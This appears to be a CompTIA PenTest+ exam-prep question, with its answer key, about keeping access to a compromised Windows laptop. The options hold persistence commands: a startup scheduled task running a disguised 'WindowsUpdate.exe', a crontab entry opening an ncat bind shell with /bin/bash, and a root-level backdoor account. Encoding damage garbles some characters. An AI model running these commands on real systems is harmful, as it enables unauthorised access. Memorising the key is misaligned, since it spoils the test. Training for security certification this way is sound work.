CompTIA PenTest+ (PT1-002) — Question 69

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

Answer options

• A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
• B. wmic startup get caption,command
• C. crontab ג€"l; echo ג€@reboot sleep 200 && ncat ג€"lvp 4242 ג€"e /bin/bashג€) | crontab 2>/dev/null
• D. sudo useradd ג€"ou 0 ג€"g 0 user

Correct answer: A

Explanation

The correct answer is A, as using schtasks to create a scheduled task allows the tester to execute the specified command at startup, ensuring persistent access. Option B merely retrieves current startup commands without establishing persistence. Option C is not applicable to Windows and relates to Linux systems, while option D is about adding a user, which does not maintain access on its own.